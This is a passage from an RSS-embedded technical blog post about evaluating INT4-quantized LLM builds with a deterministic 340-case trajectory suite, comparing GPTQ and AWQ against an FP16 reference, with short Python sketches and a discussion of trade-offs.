        &lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;post&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;GATEWAY&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;model&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                 &lt;span class="c1"&gt;# "ref/qwen-fp16" or "cand/qwen-int4"
&lt;/span&gt;            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;messages&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;case&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;render&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;state&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;temperature&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
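        &lt;span class="p"&gt;})&lt;/span&gt;
        &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;raise_for_status&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;                    &lt;span class="c1"&gt;# surface gateway/backend errors instead of scoring them
&lt;/span&gt;        &lt;span class="n"&gt;state&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;case&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;apply&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;state&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;json&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;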
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;case&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;check&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;state&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;               &lt;span class="c1"&gt;# programmatic pass/fail
&lt;/span&gt;
&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;eval_suite&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cases&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="n"&gt;httpx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;AsyncClient&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;60&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;results&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="n"&gt;asyncio&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;gather&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;run_case&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;cases&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;sum&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;results&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;results&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Temperature 0, deterministic check, no LLM judging the output. The check is code that inspects final state. When the pass criterion is itself fuzzy, you can't tell a quantization regression from judge noise, and we'd already been burned by that.&lt;/p&gt;
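
&lt;p&gt;An aggregate pass rate hides where the failures cluster. One way to surface that, sketched here under assumptions: keep per-case pass/fail for both backends, diff them, and count the flipped cases by trajectory length. The dict shapes, helper names, and toy data below are hypothetical, not our harness's actual output.&lt;/p&gt;

```python
from collections import Counter


def regressed_cases(ref_results, cand_results):
    """Return case IDs that pass on the reference but fail on the candidate.

    Both arguments are hypothetical dicts mapping case ID to a bool pass/fail.
    """
    return sorted(
        cid for cid, passed in ref_results.items()
        if passed and not cand_results[cid]
    )


def regressions_by_step_count(regressed, step_counts):
    """Count regressed cases per trajectory length (number of steps)."""
    return Counter(step_counts[cid] for cid in regressed)


# Made-up data for illustration only.
ref = {"a": True, "b": True, "c": False, "d": True}
cand = {"a": True, "b": False, "c": False, "d": False}
steps = {"a": 2, "b": 6, "c": 3, "d": 7}

flipped = regressed_cases(ref, cand)
print(flipped)                                    # ['b', 'd']
print(regressions_by_step_count(flipped, steps))  # one regression each at 6 and 7 steps
```

&lt;p&gt;Because both runs use temperature 0 and a code check, a case that flips from pass to fail is attributable to the backend rather than to sampling or judge noise.&lt;/p&gt;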

&lt;p&gt;We didn't abandon INT4. We re-ran with AWQ instead of GPTQ and bumped calibration to 1,024 samples weighted toward long sequences. That landed at 79.3% task completion. Still 1.9 points below FP16, but inside our 2-point tolerance, so we shipped it with the cost win mostly intact.&lt;/p&gt;
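
&lt;p&gt;The gate itself reduces to one comparison. A minimal sketch, assuming completion rates are expressed as percentages and the tolerance in percentage points; the function name and signature are illustrative, not our pipeline's code.&lt;/p&gt;

```python
def clears_gate(ref_pct, cand_pct, tolerance_pts=2.0):
    """Return True when the candidate's drop stays within the tolerance.

    Rates are task-completion percentages; the drop is in percentage points.
    """
    drop_pts = ref_pct - cand_pct
    return tolerance_pts >= drop_pts


print(clears_gate(81.2, 74.1))  # GPTQ build, 7.1-point drop: False
print(clears_gate(81.2, 79.3))  # AWQ build, 1.9-point drop: True
```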

&lt;h2&gt;
  
  
  Trade-offs and limitations
&lt;/h2&gt;

&lt;p&gt;A 340-case trajectory suite is expensive. Each full run takes about 11 minutes and real GPU time. Perplexity takes seconds. We can afford the suite only because we gate on it for releases, not on every commit.&lt;/p&gt;

&lt;p&gt;This finding is ours, not a law. A model serving short single-turn responses would likely show almost no gap between perplexity and task metrics, because there's no long-range constraint to lose. The wider the gap between your token-level proxy and your actual product behavior, the more this bites.&lt;/p&gt;

&lt;p&gt;Deterministic checks only work when success is checkable in code. Plenty of generation tasks aren't, and there you're stuck with judge models and their variance. We don't pretend INT4 is free either. It cost us about 2 points (81.2% to 79.3%) that we chose to pay for the throughput.&lt;/p&gt;

&lt;p&gt;And in our runs, calibration data mattered more than the algorithm. Switching GPTQ to AWQ helped, but reweighting calibration toward long sequences helped more.&lt;/p&gt;
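
&lt;p&gt;"Weighted toward long sequences" can be done several ways. One simple possibility, shown only as a sketch: sample calibration examples with probability proportional to token count. The pool format, the helper name, and the proportional weighting are all assumptions for illustration, not a description of our calibration script.&lt;/p&gt;

```python
import random


def sample_calibration(pool, k, seed=0):
    """Draw k calibration samples with probability proportional to token count.

    `pool` is a hypothetical list of (sample_id, token_count) pairs. Sampling
    is with replacement to keep the sketch short; a real pipeline may prefer
    sampling without replacement.
    """
    rng = random.Random(seed)
    weights = [tokens for _, tokens in pool]
    return rng.choices(pool, weights=weights, k=k)


# Made-up pool: 100 short samples (50 tokens) and 100 long ones (500 tokens).
pool = [(f"short-{i}", 50) for i in range(100)]
pool += [(f"long-{i}", 500) for i in range(100)]

picked = sample_calibration(pool, k=1024)
long_share = sum(1 for sid, _ in picked if sid.startswith("long")) / len(picked)
print(len(picked), round(long_share, 2))
```

&lt;p&gt;With these toy weights roughly nine in ten draws come from the long samples, even though they are only half the pool.&lt;/p&gt;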

&lt;h2&gt;
  
  
  Further Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://arxiv.org/abs/2210.17323" rel="noopener noreferrer"&gt;GPTQ paper (Frantar et al.)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://arxiv.org/abs/2306.00978" rel="noopener noreferrer"&gt;AWQ: Activation-aware Weight Quantization&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.vllm.ai/en/latest/quantization/supported_hardware.html" rel="noopener noreferrer"&gt;vLLM quantization docs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;Bifrost AI gateway&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://huggingface.co/docs/transformers/main/en/quantization/overview" rel="noopener noreferrer"&gt;Hugging Face quantization guide&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>machinelearning</category>
      <category>llm</category>
      <category>mlops</category>
      <category>pytorch</category>
    </item>
  </channel>
</rss>
